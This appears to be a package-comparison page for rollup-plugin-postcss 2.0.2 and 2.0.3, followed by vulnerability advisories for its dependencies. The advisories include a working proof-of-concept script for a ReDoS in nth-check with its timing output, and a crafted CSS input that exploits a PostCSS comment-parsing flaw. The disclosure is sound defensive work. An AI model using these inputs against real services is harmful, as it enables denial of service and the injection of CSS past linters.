Rollup Plugin PostCSS offers seamless integration of PostCSS into Rollup workflows, enabling developers to leverage modern CSS features within their JavaScript projects. Comparing versions 2.0.2 and 2.0.3, the core functionality remains consistent, focusing on processing CSS files with PostCSS and its ecosystem of plugins during the Rollup bundling process. Both versions share identical dependencies, including crucial libraries like cssnano for CSS optimization, postcss-modules for modular CSS, and postcss-load-config for flexible configuration. Development dependencies also mirror each other, suggesting stability in the tooling used for testing and building the plugin, incorporating libraries like @babel/core, eslint-config-rem, and testing frameworks like jest.
The key differentiator between the two versions lies within the release dates and unpacked sizes. Version 2.0.3 was released shortly after 2.0.2, with only a few seconds separating them, which is also reflected by minor differences in file size post extraction. This suggests that version 2.0.3 likely contains incremental fixes or tiny improvements rather than substantial feature additions compared to version 2.0.2. However, for developers, adopting the latest version (2.0.3) is typically advisable to ensure they have the most up-to-date bug fixes and refinements, contributing to a slightly more stable and optimized build process even if the changes are not immediately apparent.
All the vulnerabilities related to the version 2.0.3 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.